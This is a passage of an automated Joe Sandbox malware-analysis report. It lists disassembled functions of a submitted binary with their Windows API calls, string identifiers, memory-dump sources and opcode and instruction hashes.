                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                            • API String ID: 797121971-1840816070
                                                            • Opcode ID: 093e697d8b5164016319e11279baa81396c80c1cf3f953fce81c6f72e0ece437
                                                            • Instruction ID: cd1ebc94a721000d9124942cb92c8d98a5a3b800f47e1a861e9cf47a160ac87d
                                                            • Opcode Fuzzy Hash: 093e697d8b5164016319e11279baa81396c80c1cf3f953fce81c6f72e0ece437
                                                            • Instruction Fuzzy Hash: 6391A172248349BBD2219BA0DC89FFB77ACEB5A700F04481AF749C2181DB75A605DB72
                                                            Function 00CC6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC6FAA
                                                            • _wcslen.LIBCMT ref: 00CC7013
                                                            • _wcslen.LIBCMT ref: 00CC7084
                                                              • Part of subcall function 00CC7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00CC7AAB
                                                              • Part of subcall function 00CC7A9C: GetLastError.KERNEL32 ref: 00CC7AF1
                                                              • Part of subcall function 00CC7A9C: CloseHandle.KERNEL32(?), ref: 00CC7B00
                                                              • Part of subcall function 00CCA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641,000000FF), ref: 00CCA1F1
                                                              • Part of subcall function 00CCA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00CC977F,?,?,00CC95CF,?,?,?,?,?,00CF2641), ref: 00CCA21F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00CC7139
                                                            • CloseHandle.KERNEL32(00000000), ref: 00CC7155
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00CC7298
                                                              • Part of subcall function 00CC9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00CC73BC,?,?,?,00000000), ref: 00CC9DBC
                                                              • Part of subcall function 00CC9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00CC9E70
                                                              • Part of subcall function 00CC9620: FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00CC95D6,?,?,?,?,?,00CF2641,000000FF), ref: 00CC963B
                                                              • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA501
                                                              • Part of subcall function 00CCA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00CCA325,?,?,?,00CCA175,?,00000001,00000000,?,?), ref: 00CCA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: File$Close$AttributesCreateDeleteHandle_wcslen$BuffersChangeCurrentErrorFindFlushH_prologLastNotificationProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 2821348736-3508440684
                                                            • Opcode ID: 02e0cdc03e4c0363db78849456b2500bfe74d8e347233974e3f66c8efda39bf1
                                                            • Instruction ID: 95114e75acfa216c9d21595b95490e12a13a6a2cf4e48eda25aeede841d1bbb5
                                                            • Opcode Fuzzy Hash: 02e0cdc03e4c0363db78849456b2500bfe74d8e347233974e3f66c8efda39bf1
                                                            • Instruction Fuzzy Hash: FCC10771904644AADB21EB74CC45FFEB3A8EF04300F04465EFA5AE7282DB34AB44DB61
                                                            Function 00CED8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: 2470b02a89061878f4bd2fd56a9f528e6c2943b60a93d87a0da8c2f193374240
                                                            • Instruction ID: d7b4d547dd0cb42a2ab54b640686fe24ef419c251bc29d0d9245466d2fbaa64b
                                                            • Opcode Fuzzy Hash: 2470b02a89061878f4bd2fd56a9f528e6c2943b60a93d87a0da8c2f193374240
                                                            • Instruction Fuzzy Hash: B4C26C72E086688FDB25CF2ADD407EAB7B5EB44344F1541EAD45EE7280E774AE818F40
                                                            Function 00CC32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog_swprintf
                                                            • String ID: CMT$h%u$hc%u
                                                            • API String ID: 146138363-3282847064
                                                            • Opcode ID: 8aee816759c7e97a35f6b288c3751c52dc71966fe4707b871556770954766e9f
                                                            • Instruction ID: b4e371493b3eaecfb67e080f6a341349a5700cbe6da2c8a11302c1ae45bad27d
                                                            • Opcode Fuzzy Hash: 8aee816759c7e97a35f6b288c3751c52dc71966fe4707b871556770954766e9f
                                                            • Instruction Fuzzy Hash: BD32C371510384ABDF18DF74C895FE93BA5AF15300F08447EFD9A8B282DB749A49DB60
                                                            Function 00CC286B Relevance: 7.8, APIs: 3, Strings: 1, Instructions: 798COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00CC2874
                                                            • _strlen.LIBCMT ref: 00CC2E3F
                                                              • Part of subcall function 00CD02BA: __EH_prolog.LIBCMT ref: 00CD02BF
                                                              • Part of subcall function 00CD1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CCBAE9,00000000,?,?,?,00010456), ref: 00CD1BA0
                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC2F91
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                            • String ID: CMT
                                                            • API String ID: 1206968400-2756464174
                                                            • Opcode ID: ca1932151c833f6bc537fc1cbd695a794207c30092c3c359978f2865b65e50c1
                                                            • Instruction ID: 24fb1c7222b9835cfd24726184c91ee2a04b0024a47753a05fe04976cb6ef7d9
                                                            • Opcode Fuzzy Hash: ca1932151c833f6bc537fc1cbd695a794207c30092c3c359978f2865b65e50c1
                                                            • Instruction Fuzzy Hash: 9F6207715002858FDF19DF78C895FEA3BA1EF54300F08857EECAA8B282D7759A45DB60
                                                            Function 00CDF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CDF844
                                                            • IsDebuggerPresent.KERNEL32 ref: 00CDF910
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CDF930
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00CDF93A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 7cf94cbc9fc8af74227aca1d3c7f7dbc9681c427b025e67e83f0adc2bd57c167
                                                            • Instruction ID: 6fcebeddfc2d6d0ae72d75bc2219cba86a1bef691bc648703e298b4e918354f1
                                                            • Opcode Fuzzy Hash: 7cf94cbc9fc8af74227aca1d3c7f7dbc9681c427b025e67e83f0adc2bd57c167
                                                            • Instruction Fuzzy Hash: 9A310575D05219ABDB21DFA4D989BCCBBB8BF08304F1040AAE50DAB350EB719B85DF45
                                                            Function 00CDE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,00CDE5E8,0000001C,00CDE7DD,00000000,?,?,?,?,?,?,?,00CDE5E8,00000004,00D21CEC,00CDE86D), ref: 00CDE6B4
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CDE5E8,00000004,00D21CEC,00CDE86D), ref: 00CDE6CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            • Opcode ID: 94f96072df3cf765b2baa05dc1aa45b6768562f803a3e4a90b6aa93d91978387
                                                            • Instruction ID: f26e6ca273113e2141d5a8a97f57c9286f3e72418a144a8afff28d1bdc046691
                                                            • Opcode Fuzzy Hash: 94f96072df3cf765b2baa05dc1aa45b6768562f803a3e4a90b6aa93d91978387
                                                            • Instruction Fuzzy Hash: AF01DB726001096BDF14EE29DC49BED7BBAEFC4324F0DC125EE69DB254D634DA05C690
                                                            Function 00CE8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CE8FB5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CE8FBF
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00CE8FCC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 4241b8401ba2270a213ed99c23e3dfaaec0f5d930f35ccbc0a582ba7799402cc
                                                            • Instruction ID: 118f242b147a4089c9d29f1e4edc54909f5b5d399a371ad9a92371d69eb81af4
                                                            • Opcode Fuzzy Hash: 4241b8401ba2270a213ed99c23e3dfaaec0f5d930f35ccbc0a582ba7799402cc
                                                            • Instruction Fuzzy Hash: 1231C275901228ABCB21DF65DC89BDDBBB8BF08310F5041EAE41CA7250EB709F858F55
                                                            Function 00CED440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction ID: 7c510de64841e7e59483e8ffbea6c7aa83138824b2018a20e7987abacc7ac298
                                                            • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                            • Instruction Fuzzy Hash: 5F022D71E012199BDF14CFA9C8806ADB7F5FF48314F158269E92AE7384D731AE41CB90
                                                            Function 00CDAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00CDAF35
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,00CFE72C,?,?), ref: 00CDAF84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: FormatInfoLocaleNumber
                                                            • String ID:
                                                            • API String ID: 2169056816-0
                                                            • Opcode ID: 726e63f3b593431631490bf13e23f6b06197b6e269c713141a0df19a15f49f95
                                                            • Instruction ID: f8cca00918f375a7ee0bcde4675e4bca1212bf0ce74e007ee70b73883032f57f
                                                            • Opcode Fuzzy Hash: 726e63f3b593431631490bf13e23f6b06197b6e269c713141a0df19a15f49f95
                                                            • Instruction Fuzzy Hash: 8D015E3A100348BAD7109F64EC45FAE77B8EF08750F108422FA05D72A0D7709965CBA6
                                                            Function 00CC6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00CC6DDF,00000000,00000400), ref: 00CC6C74
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00CC6C95
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: bc155bd7904ed474d4a07d490dfdde8b31b7eba2decc267095f5e9cb88bf7c1c
                                                            • Instruction ID: bb15be224b373f85a6c705c2bcc176f67f92f252fcb3f321e88e2a61eff1c9c5
                                                            • Opcode Fuzzy Hash: bc155bd7904ed474d4a07d490dfdde8b31b7eba2decc267095f5e9cb88bf7c1c
                                                            • Instruction Fuzzy Hash: 72D0C971348300BFFA110B628E06F2E7B99BF45B91F18C409B795E80E1CA789564E62A
                                                            Function 00CF19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00CF19EF,?,?,00000008,?,?,00CF168F,00000000), ref: 00CF1C21
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: ExceptionRaise
                                                            • String ID:
                                                            • API String ID: 3997070919-0
                                                            • Opcode ID: 59e89c8ccafb069c514c2c2297b34b7cfbf5592ebf25109ac1b28718813c0d56
                                                            • Instruction ID: 2a87a58a3597d47af7608b2016e9adef07123fdc4329ba587f160e8839ab1b72
                                                            • Opcode Fuzzy Hash: 59e89c8ccafb069c514c2c2297b34b7cfbf5592ebf25109ac1b28718813c0d56
                                                            • Instruction Fuzzy Hash: 57B16E71210608DFD755CF28C48AB657BE0FF45364F298658EEAACF2A1C335DA92CB41
                                                            Function 00CDF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00CDF66A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            • Opcode ID: 5af74344436509a668e42aaaa192bbfaee2923155b8f8a51ad82c618935798b3
                                                            • Instruction ID: 83666db047a09911066ac5868eed1ac2a8c2c3cb20f9695ac21a090ecb0cac47
                                                            • Opcode Fuzzy Hash: 5af74344436509a668e42aaaa192bbfaee2923155b8f8a51ad82c618935798b3
                                                            • Instruction Fuzzy Hash: 16517E71A00619DFDB28CF54E8817AEB7F4FB58314F24852BD512EB3A1D374AA42CB61
                                                            Function 00CCB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 00CCB16B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID: Version
                                                            • String ID:
                                                            • API String ID: 1889659487-0
                                                            • Opcode ID: d7fc1c42039572af1d7f744e9144ef583664df40de0ff75b3fcfa4039469d8b1
                                                            • Instruction ID: 2361aea24d6c6df7140be6d26e42036374fc59f905605474a7f83d4599c31a12
                                                            • Opcode Fuzzy Hash: d7fc1c42039572af1d7f744e9144ef583664df40de0ff75b3fcfa4039469d8b1
                                                            • Instruction Fuzzy Hash: 2FF017B9E002188FDB18CB18EC92BE977B2EB88315F544299D519D3390C7B0AE84CE65
                                                            Function 00CC40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1687306160.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                            • Associated: 00000000.00000002.1687290150.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687336312.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687358037.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1687415968.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cc0000_kIdT4m0aa4.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gj
                                                            • API String ID: 0-4203073231
                                                            • Opcode ID: a11fab5f79d7221be051c278063b1dc4256499fa3454e3175b948720a5fac858
                                                            • Instruction ID: 39a2e00acb3e5a61890bda591f7188c1e9de8ea5b1207a5729ef8bdd1c913831
